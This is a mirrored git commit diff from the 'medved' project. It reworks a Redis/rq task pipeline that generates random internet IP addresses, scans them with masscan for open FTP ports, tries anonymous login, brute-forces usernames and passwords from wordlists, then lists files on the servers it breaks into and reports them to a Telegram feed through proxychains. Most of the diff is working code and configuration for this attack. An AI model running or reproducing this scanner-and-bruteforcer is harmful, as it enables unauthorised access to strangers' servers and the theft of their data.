mirror of
https://github.com/ChronosX88/medved.git
synced 2024-11-21 22:22:19 +00:00
Get rid of DataManager; Working rq executor; Started moving plugins
This commit is contained in:
parent
f361d2990d
commit
8015a0da1d
@ -3,110 +3,70 @@ dsl_version: 1
|
||||
|
||||
core:
|
||||
services:
|
||||
- data_manager
|
||||
# - zmq_listener
|
||||
- random_ip
|
||||
- rq_executor
|
||||
pipelines:
|
||||
- ftp
|
||||
|
||||
|
||||
services:
|
||||
data_manager:
|
||||
package: lib.data.Manager
|
||||
service: DataManager
|
||||
data:
|
||||
id: pool
|
||||
sources:
|
||||
- random_ip
|
||||
feeds:
|
||||
- test_telegram
|
||||
zmq_listener:
|
||||
package: lib.net.Listener
|
||||
service: ZMQListener
|
||||
data:
|
||||
id: pool
|
||||
listen: "0.0.0.0"
|
||||
port: 12321
|
||||
rq_executor:
|
||||
package: lib.exeq.Executor
|
||||
service: RQExecutor
|
||||
data:
|
||||
id: pool
|
||||
storage: pool
|
||||
redis:
|
||||
host: "127.0.0.1"
|
||||
|
||||
|
||||
sources:
|
||||
random_ip:
|
||||
package: lib.plugin.base.lib.IP
|
||||
service: RandomIP
|
||||
data:
|
||||
id: random_ip
|
||||
|
||||
|
||||
feeds:
|
||||
test_telegram:
|
||||
package: lib.plugin.base.lib.Telegram
|
||||
service: TelegramFeed
|
||||
data:
|
||||
id: pool
|
||||
token:
|
||||
chats:
|
||||
- id: good_evening
|
||||
pipelines: [ftp, gopher]
|
||||
filter:
|
||||
clause: any-of
|
||||
equal:
|
||||
- ftp_list_files_status: success
|
||||
- gopher_collect_status: success
|
||||
|
||||
storage: ftp_source
|
||||
|
||||
storage:
|
||||
pool:
|
||||
package: lib.plugin.base.lib.Mongo
|
||||
service: MongoStorage
|
||||
size: 40960
|
||||
size: 0
|
||||
db: "medved"
|
||||
coll: 'pool'
|
||||
random_ip:
|
||||
ftp_source:
|
||||
package: lib.plugin.base.lib.Mongo
|
||||
service: MongoStorage
|
||||
size: 500
|
||||
db: "medved"
|
||||
coll: 'randomipsource'
|
||||
coll: 'ftp_source'
|
||||
|
||||
|
||||
pipelines:
|
||||
ftp:
|
||||
source: ftp_source
|
||||
steps:
|
||||
- name: scan
|
||||
package: lib.plugin.iscan.tasks.common
|
||||
service: scan
|
||||
multiple: 10
|
||||
requires: []
|
||||
- name: connect
|
||||
package: lib.plugin.iscan.tasks.ftp
|
||||
service: connect
|
||||
multiple: False
|
||||
requires:
|
||||
- ftp_scan
|
||||
- name: list_files
|
||||
package: lib.plugin.iscan.tasks.ftp
|
||||
service: list_files
|
||||
multiple: False
|
||||
requires:
|
||||
- ftp_connect
|
||||
- task: ftp_scan
|
||||
priority: low
|
||||
multiple: 100
|
||||
- task: ftp_connect
|
||||
priority: normal
|
||||
if:
|
||||
steps.ftp_scan: true
|
||||
- task: ftp_list_files
|
||||
priority: high
|
||||
if:
|
||||
steps.ftp_connect: true
|
||||
|
||||
tasks:
|
||||
ftp_scan:
|
||||
package: lib.plugin.iscan.tasks.common
|
||||
service: MasScanTask
|
||||
ports:
|
||||
- 21
|
||||
ftp_connect:
|
||||
package: lib.plugin.iscan.tasks.ftp
|
||||
service: FTPConnectTask
|
||||
logins: data/ftp/logins.txt
|
||||
passwords: data/ftp/passwords.txt
|
||||
bruteforce: true
|
||||
timeout: 15
|
||||
ftp_list_files:
|
||||
package: lib.plugin.iscan.tasks.ftp
|
||||
service: FTPListFilesTask
|
||||
|
||||
logging:
|
||||
Storage: INFO
|
@ -4,4 +4,4 @@ export CORE_IP=$(host ${CORE_IP} | head -n1 | grep -Po "(\d+\.?){4}")
|
||||
|
||||
/tmp/confd -onetime -backend env
|
||||
|
||||
cd /mdvd && proxychains -q rq worker common -u "redis://${REDIS_IP}:6379/"
|
||||
cd /mdvd && proxychains -q rq worker high normal low -u "redis://${REDIS_IP}:6379/"
|
@ -9,7 +9,7 @@ class Service(Loadable):
|
||||
def __init__(self, thread, id, root=cnf):
|
||||
super().__init__(id, root)
|
||||
|
||||
self._data = Loader.by_id('storage', self.lcnf.get("data").get("id"))
|
||||
self._data = Loader.by_id('storage', self.lcnf.get("storage"))
|
||||
|
||||
self._stop_timeout = 10
|
||||
self._running = False
|
||||
|
@ -1,61 +0,0 @@
|
||||
from lib.data import Source, Feed
|
||||
from time import sleep
|
||||
from lib import Service, Loader
|
||||
|
||||
class DataManager(Service):
|
||||
"""Actually, we may load feeds, sources and datapools right in core. Not sure that datamanager is required just to pull sources"""
|
||||
def __init__(self, id, root):
|
||||
super().__init__(self.__run, id, root)
|
||||
self._logger.add_field('service', 'DataManager')
|
||||
|
||||
self.sources = {}
|
||||
for s in self.lcnf.get("sources"):
|
||||
self.attach_source(s)
|
||||
self.feeds = {}
|
||||
for f in self.lcnf.get("feeds"):
|
||||
self.attach_feed(f)
|
||||
|
||||
def _pre_start(self):
|
||||
self._logger.debug('starting sources')
|
||||
for _,s in self.sources.items():
|
||||
s.start()
|
||||
self._logger.debug('starting feeds')
|
||||
for _,f in self.feeds.items():
|
||||
f.start()
|
||||
|
||||
def _pre_stop(self):
|
||||
self._logger.debug('stopping sources')
|
||||
for _,s in self.sources.items():
|
||||
s.stop()
|
||||
self._logger.debug('stopping feeds')
|
||||
for _,f in self.feeds.items():
|
||||
f.stop()
|
||||
|
||||
def attach_source(self, id):
|
||||
ds = Loader.by_id('sources', id)
|
||||
self.sources[id] = ds
|
||||
|
||||
def attach_feed(self, id):
|
||||
df = Loader.by_id('feeds', id)
|
||||
self.feeds[id] = df
|
||||
|
||||
def get_source(self, name) -> Source:
|
||||
return self.sources.get(name)
|
||||
|
||||
def get_feed(self, name) -> Feed:
|
||||
return self.feeds.get(name)
|
||||
|
||||
def __run(self):
|
||||
oneshot = self.lcnf.get("oneshot", 500)
|
||||
while self._running:
|
||||
if self._data.count() < oneshot:
|
||||
while self._running and (self._data.count() + oneshot < self._data.size()):
|
||||
self._logger.debug("fill %s OF %s", self._data.count(), self._data.size())
|
||||
for _,source in self.sources.items():
|
||||
items = source.next(count=oneshot)
|
||||
if items:
|
||||
self._data.put(items)
|
||||
sleep(1)
|
||||
else:
|
||||
self._logger.debug('Pool size is ok: %s', self._data.count())
|
||||
sleep(1)
|
@ -7,11 +7,10 @@ class Source(Service):
|
||||
self._logger.add_field('service', 'Feed')
|
||||
self._logger.add_field('vname', self.__class__.__name__)
|
||||
|
||||
def item(self, val = None):
|
||||
return {
|
||||
self._item = {
|
||||
'source': self._id,
|
||||
'steps': {},
|
||||
'data': val
|
||||
'data': {}
|
||||
}
|
||||
|
||||
def next(self, count=10, block=False):
|
||||
|
@ -7,7 +7,7 @@ class Storage(Loadable):
|
||||
def __init__(self, id, root):
|
||||
super().__init__(id, root)
|
||||
|
||||
self._size = self.lcnf.get("size")
|
||||
self._size = self.lcnf.get("size", 0)
|
||||
self._logger = Logger("Storage")
|
||||
self._logger.add_field('vname', self.__class__.__name__)
|
||||
|
||||
|
@ -1,13 +0,0 @@
|
||||
from lib import Loadable, Logger
|
||||
|
||||
# dunno
|
||||
|
||||
class Type(Loadable):
|
||||
def __init__(self):
|
||||
self.data = {}
|
||||
|
||||
class Host(Type):
|
||||
def __init__(self):
|
||||
self.data = {
|
||||
'ip': ''
|
||||
}
|
@ -22,33 +22,38 @@ class RQExecutor(Executor):
|
||||
super().__init__(self.__run, id, root)
|
||||
|
||||
def __run(self):
|
||||
while self._running:
|
||||
try:
|
||||
redis_conn = Redis(host=self.lcnf.get('redis').get('host'))
|
||||
q = Queue('worker', connection=redis_conn)
|
||||
if q.count + 1 > self.lcnf.get('size', 100):
|
||||
sleep(self.lcnf.get('delay', 2))
|
||||
continue
|
||||
|
||||
jobs = []
|
||||
while self._running:
|
||||
sleep(self.lcnf.get('delay', 0.07))
|
||||
try:
|
||||
for job in [j for j in jobs if j.result is not None]:
|
||||
self._logger.debug('Publishing finished job result')
|
||||
self._data.put(job.result)
|
||||
job.cleanup()
|
||||
jobs.remove(job)
|
||||
for pn, pipeline in self.cnf.get("pipelines").items():
|
||||
self._logger.debug("pipeline: %s", pn)
|
||||
source = Loader.by_id('storage', pipeline.get('source'))
|
||||
for step in pipeline['steps']:
|
||||
self._logger.debug("step: %s", step['name'])
|
||||
filter = {
|
||||
"not_exist": [
|
||||
pn + '_' + step['name']
|
||||
],
|
||||
"exist": [
|
||||
[tag for tag in step.get("requires")]
|
||||
]
|
||||
}
|
||||
items = []
|
||||
multiple = step.get('multiple', False)
|
||||
if multiple != False:
|
||||
items = self._data.get(block=False, count=multiple, filter=filter)
|
||||
else:
|
||||
items = self._data.get(block=False, filter=filter)
|
||||
self._logger.debug("task name: %s", step['task'])
|
||||
q = Queue(step.get('priority', 'normal'), connection=redis_conn)
|
||||
if q.count + 1 > self.lcnf.get('qsize', 100):
|
||||
continue
|
||||
filter = {"steps.%s" % step['task']: {'$exists': False}}
|
||||
filter.update({key: value for key, value in step.get("if", {}).items()})
|
||||
count = step.get('multiple') if step.get('multiple', False) else 1
|
||||
# get as much as possible from own pool
|
||||
items = self._data.get(block=False, count=count, filter=filter)
|
||||
# obtain everything else from source
|
||||
if len(items) < count:
|
||||
items.extend(source.get(block=False, count=(count - len(items)), filter=filter))
|
||||
if items:
|
||||
self._logger.debug("enqueueing %s.%s with %s", step['package'], step['service'], items)
|
||||
q.enqueue("%s.%s" % (step['package'], step['service']), items)
|
||||
for i in items:
|
||||
i['steps'][step['task']] = None
|
||||
self._logger.debug("enqueueing task '%s' (count: %s)", step['task'], len(items))
|
||||
job = q.enqueue("lib.exeq.Task.run", step['task'], items)
|
||||
jobs.append(job)
|
||||
except Exception as e:
|
||||
self._logger.error(e)
|
||||
self._logger.error("Error in executor main thread: %s", e)
|
@ -1,7 +0,0 @@
|
||||
from lib import Loadable
|
||||
#TODO dunno
|
||||
class Pipeline(Loadable):
|
||||
def __init__(self, id, root):
|
||||
super().__init__(id, root)
|
||||
|
||||
|
23
lib/exeq/Task.py
Normal file
23
lib/exeq/Task.py
Normal file
@ -0,0 +1,23 @@
|
||||
from lib import Loadable, Logger, Loader
|
||||
|
||||
from Config import cnf
|
||||
|
||||
class Task(Loadable):
|
||||
def __init__(self, id, root):
|
||||
super().__init__(id, root)
|
||||
self._logger = Logger(self.__class__.__name__)
|
||||
|
||||
def run(self, items):
|
||||
result = []
|
||||
try:
|
||||
result = self._run(items)
|
||||
except Exception as e:
|
||||
self._logger.debug("Error occured while executing: %s", e)
|
||||
return result
|
||||
|
||||
def _run(self, items):
|
||||
return items
|
||||
|
||||
def run(task_name, items):
|
||||
result = Loader.by_id('tasks', task_name).run(items)
|
||||
return result
|
@ -1 +1,2 @@
|
||||
from .Executor import Executor
|
||||
from .Task import Task
|
||||
|
@ -1,7 +0,0 @@
|
||||
class Task:
|
||||
"""Pipelines should consist of tasks??..."""
|
||||
def __init__(self):
|
||||
self._data = None
|
||||
|
||||
def run(self):
|
||||
pass
|
@ -1,6 +1,8 @@
|
||||
from lib.data import Source
|
||||
from lib import Loader
|
||||
|
||||
import copy
|
||||
|
||||
from time import sleep
|
||||
|
||||
import os
|
||||
@ -14,13 +16,12 @@ class IPSource(Source):
|
||||
def __init__(self, thread, id, root):
|
||||
super().__init__(thread, id, root)
|
||||
|
||||
def item(self, val = None):
|
||||
return {
|
||||
self._item.update ({
|
||||
'source': self._id,
|
||||
'data': {
|
||||
'ip': val
|
||||
}
|
||||
'ip': None
|
||||
}
|
||||
})
|
||||
|
||||
|
||||
class IPRange(IPSource):
|
||||
@ -80,8 +81,10 @@ class RandomIP(IPSource):
|
||||
try:
|
||||
items = []
|
||||
for _ in itertools.repeat(None, self.lcnf.get("oneshot", 100)):
|
||||
item = copy.deepcopy(self._item)
|
||||
randomip = socket.inet_ntoa(struct.pack('>I', random.randint(1, 0xffffffff)))
|
||||
items.append(self.item(str(randomip)))
|
||||
item['data']['ip'] = str(randomip)
|
||||
items.append(item)
|
||||
self._data.put(items)
|
||||
sleep(self.lcnf.get("delay", 0.5))
|
||||
except Exception as e:
|
||||
|
@ -17,41 +17,37 @@ class MongoStorage(Storage):
|
||||
return self._coll.count()
|
||||
|
||||
def _get(self, block, filter):
|
||||
# TODO cleanup dat BS
|
||||
if filter is None:
|
||||
filter = {}
|
||||
ne_tags = {}
|
||||
e_tags = {}
|
||||
if filter.get('not_exist'):
|
||||
tags = []
|
||||
for ne in filter.get('not_exist'):
|
||||
tags.append(ne)
|
||||
ne_tags = {'tags': {'$not': {'$all': tags}}}
|
||||
del filter['not_exist']
|
||||
if filter.get('exist'):
|
||||
tags = []
|
||||
for e in filter.get('exist'):
|
||||
tags.append(e)
|
||||
e_tags = {'tags': {'$all': tags}}
|
||||
del filter['exist']
|
||||
filter = {'$and': [ne_tags, e_tags]}
|
||||
else:
|
||||
self._logger.debug(filter)
|
||||
item = self._coll.find_one_and_delete(filter=filter)
|
||||
if block:
|
||||
while not item:
|
||||
item = self._coll.find_one_and_delete(filter=filter)
|
||||
sleep(1)
|
||||
|
||||
return item
|
||||
def _get_many(self, count, block, filter):
|
||||
if filter is None:
|
||||
filter = {}
|
||||
else:
|
||||
self._logger.debug(filter)
|
||||
items = self._coll.find(filter=filter, limit=count)
|
||||
result = []
|
||||
for i in items:
|
||||
self._coll.delete_one({'_id': i['_id']})
|
||||
result.append(i)
|
||||
return result
|
||||
|
||||
def _put(self, item, block):
|
||||
if block:
|
||||
if block and self.size() is not 0:
|
||||
while self.count() + 1 > self.size():
|
||||
self._logger.debug('Collection full: %s of %s', self.count(), self.size())
|
||||
sleep(1)
|
||||
self._coll.insert_one(item)
|
||||
|
||||
def _put_many(self, items, block):
|
||||
if block:
|
||||
if block and self.size() is not 0:
|
||||
while self.count() + len(items) > self.size():
|
||||
self._logger.debug('Collection full: %s of %s', self.count(), self.size())
|
||||
sleep(1)
|
||||
|
@ -7,8 +7,7 @@ from lib import Logger
|
||||
import GeoIP
|
||||
from Config import cnf
|
||||
|
||||
logger = Logger("common")
|
||||
|
||||
from lib.exeq import Task
|
||||
|
||||
class MasScan:
|
||||
def __init__(self, bin_path='/usr/bin/masscan', opts="-sS -Pn -n --wait 0 --max-rate 5000"):
|
||||
@ -30,29 +29,47 @@ class MasScan:
|
||||
result = parser.loads(out)
|
||||
return result
|
||||
|
||||
def scan(items):
|
||||
gi = GeoIP.open(cnf.get("geoip_dat", "/usr/share/GeoIP/GeoIP.dat"), GeoIP.GEOIP_INDEX_CACHE | GeoIP.GEOIP_CHECK_CACHE)
|
||||
logger.debug("Starting scan")
|
||||
class MasScanTask(Task):
|
||||
def __init__(self, id, root):
|
||||
super().__init__(id, root)
|
||||
|
||||
def _run(self, items):
|
||||
result = []
|
||||
|
||||
gi = GeoIP.open(cnf.get("geoip_dat", "/usr/share/GeoIP/GeoIPCity.dat"), GeoIP.GEOIP_INDEX_CACHE | GeoIP.GEOIP_CHECK_CACHE)
|
||||
ip_list = [i['data']['ip'] for i in items]
|
||||
port_list = cnf.get("tasks").get(self._id).get("ports")
|
||||
|
||||
self._logger.debug("Starting scan, ip_list=%s, port_list=%s", ip_list, port_list)
|
||||
|
||||
ms = MasScan()
|
||||
hosts = ms.scan(ip_list=[i['data']['ip'] for i in items],
|
||||
port_list=cnf.get("tasks").get('ftp_scan').get("ports"))
|
||||
logger.debug(hosts)
|
||||
for h in hosts:
|
||||
for port in h['ports']:
|
||||
host = {
|
||||
'ip': h['ip'],
|
||||
'port': port['port'],
|
||||
'data': {
|
||||
hosts = ms.scan(ip_list=ip_list, port_list=port_list)
|
||||
|
||||
self._logger.debug(hosts)
|
||||
hosts = {h['ip']: h for h in hosts}
|
||||
for item in items:
|
||||
data = {}
|
||||
result = False
|
||||
if hosts.get(item['data']['ip']):
|
||||
data = {
|
||||
'ports': [p['port'] for p in hosts[item['data']['ip']]['ports']],
|
||||
'geo': {
|
||||
'country': None,
|
||||
'city': None
|
||||
}
|
||||
}
|
||||
}
|
||||
geodata = gi.record_by_name(host['ip'])
|
||||
result = True
|
||||
geodata = gi.record_by_name(item['data']['ip'])
|
||||
if geodata:
|
||||
if 'country_code3' in geodata and geodata['country_code3']:
|
||||
host['data']['geo']['country'] = geodata['country_code3']
|
||||
data['geo']['country'] = geodata['country_code3']
|
||||
if 'city' in geodata and geodata['city']:
|
||||
host['data']['geo']['city'] = geodata['city']
|
||||
logger.debug("Found %s:%s", host['ip'], host['port'])
|
||||
data['geo']['city'] = geodata['city']
|
||||
self._logger.debug(data)
|
||||
item['data'].update(data)
|
||||
item['steps'][self._id] = result
|
||||
if result:
|
||||
self._logger.debug("Found %s with open %s", item['data']['ip'], item['data']['ports'])
|
||||
|
||||
self._logger.debug(items)
|
||||
return items
|
||||
|
121
lib/plugin/iscan/tasks/ftp.py
Normal file
121
lib/plugin/iscan/tasks/ftp.py
Normal file
@ -0,0 +1,121 @@
|
||||
# pylint: disable=E1101
|
||||
|
||||
import ftplib
|
||||
import netaddr
|
||||
|
||||
from lib import Logger
|
||||
from Config import cnf
|
||||
|
||||
from lib.exeq import Task
|
||||
|
||||
class FTPConnectTask(Task):
|
||||
def __init__(self, id, root):
|
||||
super().__init__(id, root)
|
||||
|
||||
def _process(self, item):
|
||||
data = {}
|
||||
result = False
|
||||
|
||||
self.ftp = ftplib.FTP(host=item['data']['ip'], timeout=self.lcnf.get('timeout', 30))
|
||||
try:
|
||||
self._logger.debug('Trying anonymous login')
|
||||
self.ftp.login()
|
||||
except ftplib.error_perm:
|
||||
pass
|
||||
else:
|
||||
self._logger.debug('Succeeded with anonymous')
|
||||
data['username'] = 'anonymous'
|
||||
data['password'] = ''
|
||||
result = True
|
||||
|
||||
self._logger.debug(data)
|
||||
item['data'].update(data)
|
||||
item['steps'][self._id] = result
|
||||
return
|
||||
|
||||
if self.lcnf.get('bruteforce', False):
|
||||
usernames = []
|
||||
passwords = []
|
||||
|
||||
with open(self.lcnf.get('logins'), 'r') as lfh:
|
||||
for username in lfh:
|
||||
usernames.append(username.rstrip())
|
||||
with open(self.lcnf.get('passwords'), 'r') as pfh:
|
||||
for password in pfh:
|
||||
passwords.append(password.rstrip())
|
||||
for username in usernames:
|
||||
for password in passwords:
|
||||
try:
|
||||
self.ftp.voidcmd('NOOP')
|
||||
except IOError:
|
||||
self.ftp = ftplib.FTP(host=item['data']['ip'], timeout=self.lcnf.get('timeout', 30))
|
||||
self._logger.debug('Trying %s' % (username + ':' + password))
|
||||
try:
|
||||
self.ftp.login(username, password)
|
||||
except ftplib.error_perm:
|
||||
continue
|
||||
except:
|
||||
raise
|
||||
else:
|
||||
self._logger.debug('Succeeded with %s' %(username + ':' + password))
|
||||
data['username'] = username
|
||||
data['password'] = password
|
||||
result = True
|
||||
|
||||
|
||||
self._logger.debug(data)
|
||||
item['data'].update(data)
|
||||
item['steps'][self._id] = result
|
||||
return
|
||||
self._logger.debug(data)
|
||||
item['data'].update(data)
|
||||
item['steps'][self._id] = result
|
||||
|
||||
def _run(self, items):
|
||||
for item in items:
|
||||
self._process(item)
|
||||
return items
|
||||
|
||||
class FTPListFilesTask(Task):
|
||||
def __init__(self, id, root):
|
||||
super().__init__(id, root)
|
||||
|
||||
def _process(self, item):
|
||||
self.ftp = ftplib.FTP(host=item['data']['ip'],
|
||||
user=item['data']['username'],
|
||||
passwd=item['data']['password'])
|
||||
filelist = self.ftp.nlst()
|
||||
try:
|
||||
self.ftp.quit()
|
||||
except:
|
||||
# that's weird, but we don't care
|
||||
pass
|
||||
|
||||
try:
|
||||
if len(filelist) == 0 or filelist[0] == "total 0":
|
||||
raise self.PipelineError("Empty server")
|
||||
except IndexError:
|
||||
pass
|
||||
|
||||
item['data']['files'] = []
|
||||
for fileName in filelist:
|
||||
item['data']['files'].append(fileName)
|
||||
|
||||
def _filter(self, item):
|
||||
item['data']['filter'] = False
|
||||
if len(item['data']['files']) == 0:
|
||||
item['data']['filter'] = "Empty"
|
||||
elif len(item['data']['files']) < 6:
|
||||
match = 0
|
||||
for f in 'incoming', '..', '.ftpquota', '.', 'pub':
|
||||
if f in item['data']['files']:
|
||||
match += 1
|
||||
if match == len(item['data']['files']):
|
||||
item['data']['filter'] = "EmptyWithSystemDirs"
|
||||
|
||||
def _run(self, items):
|
||||
for item in items:
|
||||
self._process(item)
|
||||
if self.lcnf.get('filter', False):
|
||||
self._filter(item)
|
||||
return items
|
@ -2,11 +2,10 @@ import ftplib
|
||||
import netaddr
|
||||
|
||||
from Config import cnf
|
||||
from lib.plugin.plugins import BasePlugin
|
||||
|
||||
|
||||
class Plugin(BasePlugin):
|
||||
class TelegramMessage(BasePlugin.TelegramMessage):
|
||||
class Plugin():
|
||||
class TelegramMessage():
|
||||
def _init(self):
|
||||
self._name = "FTP"
|
||||
|
||||
@ -17,94 +16,3 @@ class Plugin(BasePlugin):
|
||||
self.data['txt'] += " + %s\n" % filename
|
||||
self.data['txt'] += "Geo: %s/%s\n" % (self._host['data']['geo']['country'], self._host['data']['geo']['city'])
|
||||
self.data['txt'] += "#ftp_" + str(int(netaddr.IPAddress(self._host['ip'])))
|
||||
|
||||
class Pipeline(BasePlugin.Pipeline):
|
||||
def _init(self):
|
||||
self._name = "FTP"
|
||||
|
||||
def run(self):
|
||||
try:
|
||||
self._connect()
|
||||
self._find()
|
||||
self._filter()
|
||||
self._push()
|
||||
except Exception as e:
|
||||
self._logger.debug("Error occured: %s (%s)", e, self._host['ip'])
|
||||
else:
|
||||
self._logger.info("Succeeded for %s" % self._host['ip'])
|
||||
|
||||
def _connect(self):
|
||||
self.ftp = ftplib.FTP(host=self._host['ip'], timeout=cnf.stalker.FTP.timeout)
|
||||
try:
|
||||
self._logger.debug('Trying anonymous login')
|
||||
self.ftp.login()
|
||||
except ftplib.error_perm:
|
||||
pass
|
||||
else:
|
||||
self._logger.debug('Succeeded with anonymous')
|
||||
self._host['data']['username'] = 'anonymous'
|
||||
self._host['data']['password'] = ''
|
||||
return
|
||||
|
||||
if cnf.stalker.FTP.bruteforce:
|
||||
usernames = []
|
||||
passwords = []
|
||||
|
||||
with open(cnf.stalker.FTP.logins, 'r') as lfh:
|
||||
for username in lfh:
|
||||
usernames.append(username.rstrip())
|
||||
with open(cnf.stalker.FTP.passwords, 'r') as pfh:
|
||||
for password in pfh:
|
||||
passwords.append(password.rstrip())
|
||||
for username in usernames:
|
||||
for password in passwords:
|
||||
try:
|
||||
self.ftp.voidcmd('NOOP')
|
||||
except IOError:
|
||||
self.ftp = ftplib.FTP(host=self._host['ip'], timeout=cnf.stalker.FTP.timeout)
|
||||
self._logger.debug('Trying %s' % (username + ':' + password))
|
||||
try:
|
||||
self.ftp.login(username, password)
|
||||
except ftplib.error_perm:
|
||||
continue
|
||||
except:
|
||||
raise
|
||||
else:
|
||||
self._logger.debug('Succeeded with %s' %(username + ':' + password))
|
||||
self._host['data']['username'] = username
|
||||
self._host['data']['password'] = password
|
||||
return
|
||||
raise Exception('No matching credentials found')
|
||||
|
||||
def _find(self):
|
||||
filelist = self.ftp.nlst()
|
||||
try:
|
||||
self.ftp.quit()
|
||||
except:
|
||||
# that's weird, but we don't care
|
||||
pass
|
||||
|
||||
try:
|
||||
if len(filelist) == 0 or filelist[0] == "total 0":
|
||||
raise self.PipelineError("Empty server")
|
||||
except IndexError:
|
||||
pass
|
||||
|
||||
self._host['data']['files'] = []
|
||||
for fileName in filelist:
|
||||
self._host['data']['files'].append(fileName)
|
||||
|
||||
def _filter(self):
|
||||
self._host['data']['filter'] = False
|
||||
if len(self._host['data']['files']) == 0:
|
||||
self._host['data']['filter'] = "Empty"
|
||||
elif len(self._host['data']['files']) < 6:
|
||||
match = 0
|
||||
for f in 'incoming', '..', '.ftpquota', '.', 'pub':
|
||||
if f in self._host['data']['files']:
|
||||
match += 1
|
||||
if match == len(self._host['data']['files']):
|
||||
self._host['data']['filter'] = "EmptyWithSystemDirs"
|
||||
|
||||
|
||||
|
||||
|
@ -1,2 +0,0 @@
|
||||
#from .scan import scan
|
||||
#from .stalk import stalk
|
@ -1,8 +0,0 @@
|
||||
from lib.plugin import Manager
|
||||
# legacy
|
||||
# why legacy?
|
||||
def worker(host, plugin):
|
||||
p = Manager.get_plugin(plugin)
|
||||
p.Plugin.Pipeline(host, plugin)
|
||||
del p
|
||||
# cool bro
|
@ -74,8 +74,8 @@ class Logger(logging.Logger):
|
||||
class Loadable:
|
||||
"""parent for loadable from configuration"""
|
||||
def __init__(self, id, root=config):
|
||||
self.cnf = config
|
||||
self.lcnf = root[id]
|
||||
self.cnf = config # global config
|
||||
self.lcnf = root[id] # local config
|
||||
self._id = id
|
||||
|
||||
|
||||
|
Loading…
Reference in New Issue
Block a user